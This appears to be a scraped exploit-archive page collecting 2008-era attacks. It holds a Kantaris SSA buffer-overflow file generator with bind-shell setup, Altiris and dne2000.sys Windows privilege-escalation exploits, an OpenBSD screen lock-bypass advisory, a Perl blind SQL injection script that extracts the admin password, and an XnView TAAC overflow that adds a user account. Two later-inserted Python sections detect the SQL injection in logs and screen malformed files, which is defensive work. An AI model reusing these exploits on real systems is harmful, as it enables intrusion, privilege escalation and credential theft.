# and discovering a very interesting thing that we will publish soon

#
# I piss on your Business Networks course Igor Radusinovic! Go to hell!
#
# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu


import os

jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...

# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum

bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc

fileHandle = open ( 'film.ssa', 'w' )

fileHandle.write ( '[Script Info]\n')
fileHandle.write ( 'ScriptType: v4.00\n')
fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n')
fileHandle.write ( 'Collisions: Normal\n\n')

fileHandle.write ( '[V4 Styles]\n\n')
fileHandle.write ( '[Events]\n')

fileHandle.write ( 'Dialogue: '+ bafer)
fileHandle.close()

Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exp


// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day)
//
// Affected Versions : Altiris Client 6.5.248
// Altiris Client 6.5.299
// Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
int id,a=0;
char langH[255][255];
char langO[255][255];
char wname[]="Altiris Client Service";

strcpy(langH[0x0c],"Aide de Windows");
strcpy(langH[0x09],"Windows Help");
strcpy(langH[0x0a],"Ayuda de Windows");

strcpy(langO[0x0c],"Ouvrir");
strcpy(langO[0x09],"Open");
strcpy(langO[0x0a],"Abrir");

printf("##########################################################\n");
printf("# Altiris Client Service #\n");
printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
printf("# by sirdarckcat & alt3kx #\n");
printf("# #\n");
printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
printf("# by Cesar Cerrudo #\n");
printf("##########################################################\n\n");

id=PRIMARYLANGID(GetSystemDefaultLangID());
if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
printf("Lang not found, using english\n");
id=9;
}

char sText[]="%windir%\\system32\\cmd.ex?";

if (argc<2){
printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
printf("Look for your LANG-ID here:\n");
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
printf("\nAnyway, the program will try to guess it.\n\n");
return 0;
}else{
if (argc==2){
if (langH[atoi(argv[1])]){
id=atoi(argv[1]);
printf("Lang changed\n");
}else{
printf("Lang not supported\n",id);
}
}
}
printf("Using Lang %d\n",id);
printf("Looking for %s..\n",wname);
lHandle=FindWindow(NULL, wname);
if (!lHandle) {
printf("Window %s not found\n", wname);
return 0;
}else{
printf("Found! exploiting..\n");
}
PostMessage(lHandle,0x313,NULL,NULL);

Sleep(100);

SendMessage(lHandle,0x365,NULL,0x1);
Sleep(300);
pp:
if (!FindWindow(NULL, langH[id])){
printf("Help Window not found.. exploit unsuccesful\n");
if (id!=9){
printf("Trying with english..\n");
id=9;
goto pp;
}else{
return 0;
}
}else{
printf("Help Window found! exploiting..\n");
}
SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);
lHandle = FindWindow("#32770",langO[id]);
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);
printf("Sending path..\n");
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
lHandle2 = GetDlgItem(lHandle, 0x4A0);
printf("Looking for cmd..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
lHandle2 = GetDlgItem(lHandle2, 0x1);
printf("Sending keys..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
Sleep(500);
mark:
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);
Sleep(1000);
printf("Opening shell..\n");
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
Sleep(1000);
if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
printf("Failed\n");
if (!a){
a++;
goto mark;
}
}else{
printf("Done!\n");
}
if(!a){
SendMessage (lHandle, WM_CLOSE,0,0);
Sleep(500);
SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
}else{
printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
}
return 0;
}

Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit


/* dne2000-call.c
*
* Copyright (c) 2008 by
*
* Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit
* by mu-b - Sun 06 Jan 2008
*
* - Tested on: dne2000.sys 2.21.7.233 <-> 3.21.7.17464
* bundled with: SafeNET HighAssurance Remote, SoftRemote
* Cisco VPN Client
* Winproxy
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/

#include
#include

#include
#include

#define DNE_IOCTL 0x00222008
#define DNE_FLAG 0x00001005

#define ITEM_FLAG_1 0x4A424F4E
#define ITEM_FLAG_2 0x47554C50
#define FUNC_FLAG 0x00010003

static unsigned char win32_fixup[] =
"\x56";


static unsigned char win32_ret[] =
"\x5e"
"\xc2\x10\x00";

struct ioctl_func {
char _pad[0x04];
int flag;
char __pad[0x2C];
void *func_ptr;
};

struct ioctl_item {
int flag;
char _pad[0x24];
struct ioctl_func *item_func;
struct ioctl_item *item_ptr;
};

struct ioctl_req {
int req_num;
struct ioctl_item *ptr[2];
};

static PCHAR
fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;

dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

if (dwMajorVersion != 5)
{
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}

switch (dwMinorVersion)
{
case 1:
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);

case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);

default:
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}

return (NULL);
}

int
main (int argc, char **argv)
{
struct ioctl_req req;
struct ioctl_item items[2];
struct ioctl_func funcs;
LPVOID zpage, zbuf;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL result;

printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n"
"by: \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

if (argc <= 1)
{
fprintf (stderr, "Usage: %s \n", argv[0]);
exit (EXIT_SUCCESS);
}

ppid = atoi (argv[1]);

hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}

zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);

memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);

memset (&req, 0, sizeof req);
req.req_num = DNE_FLAG;
req.ptr[0] = NULL;
req.ptr[1] = &items[0];

memset (items, 0, sizeof items);
items[0].flag = ITEM_FLAG_1;
items[0].item_ptr = &items[1];

items[1].flag = ITEM_FLAG_2;
items[1].item_func = &funcs;

memset (&funcs, 0, sizeof funcs);
funcs.flag = FUNC_FLAG;
funcs.func_ptr = zpage;

printf ("* req.ptr: 0x%08X\n", &items[0]);
printf ("* @0x%08X: flag: 0x%08X, item_ptr: 0x%08X\n",
&items[0], items[0].flag, items[0].item_ptr);
printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n",
items[0].item_ptr, items[1].flag, items[1].item_func);
printf ("* @0x%08X: flag: 0x%08X, func_ptr: 0x%08X\n",
items[1].item_func, funcs.flag, funcs.func_ptr);

/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, DNE_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");

CloseHandle (hFile);

return (EXIT_SUCCESS);
}

screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)

Helith - 0815
--------------------------------------------------------------------------------

Author: Rembrandt
Date : Known since somewhere in &cant_remember (some years, really..)
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (which will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people


I did not find an advisory related to this, so I decided to write a leet one.

screen is vulnerable to an authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But due to the nature of the behavior of screen and OpenBSD it should be
architecture/version independent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and, if you like, screen -x to reattach the screen session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you won't be able to lock your shell.
screen will never ask you for a password.

Of course this also works if you get access to an SSH session which has a locked
screen running. So in case you have locked your screen session which contains
an open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Important for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scary Linux distributions
which are not really common.

All security websites which report that this is a fake may consider updating their
reports instead of simply claiming wrong things.

Have fun!

Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit


#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

# Download: http://sidb.sourceforge.net/
# Dork: "Scientific Image DataBase"
# This exploit retrives the admin username/password via blind mysql injection.


print <-------------------------------------
- Scientific Image DataBase <= 0.41 -
- Blind SQL Injection Exploit -
- -
- Coded && Discovered By: t0pP8uZz -
- Discovered On: 19 JUNE 2008 -
-------------------------------------
-Greetz: muts, perlunderground, h-y -
- cipher, milw0rm -
-------------------------------------

INFO

print "Enter URL(ie: http://site.com): ";
chomp(my $url=);

my ($substr, $done, $chr, $res) = (1, 1, 48, "");

my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
$ua->post($url."/login.php", { 'logon' => 'true', 'user' => 'guest', 'pwd' => 'guest', 'submit' => 'Login' } );

while($done) {
my $content = $ua->get($url."/projects.php?show=true&id=57%20and%20ascii(substring((select%20pwd%20from%20users%20where%20userid=1),".$substr.",1))=".$chr);

if($content->content =~ /Not meant/ && length($res) == 32) { $done = 0; }
elsif($content->content !~ /Not meant/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
print "Username: sysadmin Password: ".$res."\n";
exit;
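
A detection-side counterpart to the script above, added here as an example and not part of the original exploit or of the SIDB project: it scans web access logs for the boolean-blind pattern this script generates, where one client sends many requests to `projects.php` whose `id` value is a SQL expression differing only in its numbers. The log format, function names, threshold and sample lines are assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Assumptions: Apache-style access log lines, and "id" is a parameter the
# application expects to be a plain integer.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')
SQL_TOKENS = re.compile(r"\b(select|union|substring|ascii|sleep|benchmark)\b", re.I)
INTEGER_PARAMS = ("id",)
THRESHOLD = 5  # requests sharing one template before a client is reported


def non_integer_values(url):
    """Return (name, decoded value) for integer parameters that are not integers."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [(name, value)
            for name in INTEGER_PARAMS
            for value in query.get(name, [])
            if not value.strip().isdigit()]


def detect_blind_sqli(lines, threshold=THRESHOLD):
    """Group SQL-bearing parameter values by client and by digit-normalised template.

    Blind extraction repeats one expression while only the position and the
    compared character code change, so replacing every number with "N"
    collapses the whole run into a single template that can be counted.
    """
    templates = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, url, _status = m.groups()
        path = urlsplit(url).path
        for name, value in non_integer_values(url):
            if SQL_TOKENS.search(value):
                template = re.sub(r"\d+", "N", value.lower())
                templates[(client, path, name, template)] += 1
    return [(client, path, name, count)
            for (client, path, name, _tmpl), count in sorted(templates.items())
            if count >= threshold]


# Constructed sample log: one ordinary request, then eight requests that
# differ only in the compared character code (addresses are documentation ranges).
SAMPLE_LOG = [
    '198.51.100.4 - - [30/Jul/2008:10:00:00 +0000] '
    '"GET /projects.php?show=true&id=57 HTTP/1.1" 200 5120',
] + [
    '203.0.113.7 - - [30/Jul/2008:10:00:%02d +0000] '
    '"GET /projects.php?show=true&id=57%%20and%%20ascii(substring((select%%20pwd'
    '%%20from%%20users%%20where%%20userid=1),1,1))=%d HTTP/1.1" 200 812' % (i, 48 + i)
    for i in range(8)
]

if __name__ == "__main__":
    for client, path, name, count in detect_blind_sqli(SAMPLE_LOG):
        print(f"{client}: {count} templated SQL probes against {path} ({name}=)")
```

Detection only narrows the window; the durable fix is in the application, which should bind `id` as an integer parameter instead of concatenating it into the query.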

XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit


#include
#include
/*
XnView 1.93.6 for Windows .taac buffer overflow proof of concept.

The vulnerability is caused due to a boundary error when processing
the "format" keyword of Sun TAAC files. This can be exploited to
cause a stack-based buffer overflow by e.g. tricking a user into
viewing a specially crafted Sun TAAC file.

Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/

Exploit code by Shinnok raydenxy@yahoo.com
http://www.rstcenter.com

This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows
will cause a buffer overflow and add an user "test" with password "test".
Tested on Windows XP sp2&sp3.

greetz to escalation666
/*

/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */


unsigned char ra_sp2[] = "\xed\x1e\x94\x7c";
unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b";

unsigned char nops1[257]; //256 * \x90
unsigned char nops2[21]; //20 * \x90

int main(int argc, char **argv)
{
int i;
FILE* f;
printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n");
printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n");
printf("[+] Coded by shinnok,greetz to escalation666.\n http://www.rstcenter.com \n");
if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){
printf("Usage: %s target\n",argv[0]);
printf("Where target is:\n");
printf("0: WinXP SP2\n");
printf("1: WinXP SP3\n");
printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n");
return EXIT_SUCCESS;
}
for(i=0;i<256;i++) nops1[i]='\x90';
nops1[256]='\0';
for(i=0;i<14;i++) nops2[i]='\x90';
nops2[20]='\0';
if(atoi(argv[1])==0) {
f=fopen("sploit.taac","wb");
fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa');
fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa');
}else{
f=fopen("sploit.taac","wb");
fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa');
fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa');
}
fclose(f);
printf("sploit.taac created!\n");
printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n");
printf("Then check with \"net user\" or from control panel for the user account test.\n");
return EXIT_SUCCESS;
}
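
A defensive counterpart to the two file-format overflows on this page (the Kantaris SSA `Dialogue:` line and the XnView TAAC `format` keyword), added here as an example and not part of either original exploit or product: a pre-screening check that rejects oversized or non-text fields before a file reaches the player or viewer. The length limits, function names and sample bytes are assumptions, SSA input is assumed to use an 8-bit text encoding, and the TAAC layout is inferred only from the header the code above writes.

```python
import re

# Assumed policy limits (not taken from either format's specification).
MAX_SSA_LINE = 4096    # longest line accepted in an SSA script
MAX_TAAC_VALUE = 256   # longest value accepted in a TAAC "keyword=value;" field

_CONTROL = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")
_TAAC_KEY = re.compile(rb"\s*([A-Za-z_]+)=")


def check_ssa(data: bytes) -> list:
    """Return (line_no, section, field, reason) for each suspicious SSA line."""
    findings, section = [], None
    for n, raw in enumerate(data.split(b"\n"), 1):
        line = raw.rstrip(b"\r")
        if line.startswith(b"[") and line.endswith(b"]"):
            section = line.decode("ascii", "replace")
            continue
        field = line.split(b":", 1)[0][:32].decode("ascii", "replace")
        if len(line) > MAX_SSA_LINE:
            findings.append((n, section, field, f"{len(line)}-byte line"))
        elif _CONTROL.search(line):
            findings.append((n, section, field, "control bytes in text"))
    return findings


def check_taac(data: bytes) -> list:
    """Walk the "keyword=value;" header with a bounded search for each ';'."""
    if not data.startswith(b"ncaa"):
        return ["missing ncaa signature"]
    findings, pos = [], 4
    while True:
        m = _TAAC_KEY.match(data, pos)
        if not m:
            break  # no further keyword: assume the header has ended
        key = m.group(1).decode("ascii")
        # Never look further than the limit, so a huge value costs nothing to reject.
        end = data.find(b";", m.end(), m.end() + MAX_TAAC_VALUE + 1)
        if end == -1:
            findings.append(f"{key}: value not terminated within {MAX_TAAC_VALUE} bytes")
            break
        value = data[m.end():end]
        if _CONTROL.search(value) or any(b > 0x7E for b in value):
            findings.append(f"{key}: non-text bytes in value")
        pos = end + 1
    return findings


def screen_file(name: str, data: bytes) -> list:
    """Dispatch on extension; an empty list means nothing was flagged."""
    lower = name.lower()
    if lower.endswith(".ssa"):
        return check_ssa(data)
    if lower.endswith(".taac"):
        return check_taac(data)
    return []


# Constructed samples: filler bytes only, no payload.
SSA_OVERSIZED = (b"[Script Info]\nScriptType: v4.00\nTitle: sample\n\n"
                 b"[Events]\nDialogue: " + b"A" * 200000)
SSA_NORMAL = (b"[Script Info]\nScriptType: v4.00\n\n[Events]\n"
              b"Dialogue: Marked=0,0:00:01.00,0:00:03.00,Default,,0,0,0,,Hello\n")
TAAC_HEADER = b"ncaa\nrank=2;\nbands=3;\nsize=125 123;\n"
TAAC_OVERSIZED = TAAC_HEADER + b"format=" + b"A" * 300 + b";\n"
TAAC_NORMAL = TAAC_HEADER + b"format=sample;\n"  # placeholder value

if __name__ == "__main__":
    for label, name, blob in [("oversized SSA", "film.ssa", SSA_OVERSIZED),
                              ("oversized TAAC", "sample.taac", TAAC_OVERSIZED)]:
        print(label, "->", screen_file(name, blob))
```

A check like this belongs at the point where untrusted files enter (mail gateway, download folder, upload handler); it does not replace updating the affected player or viewer.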

muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BOF Exploit
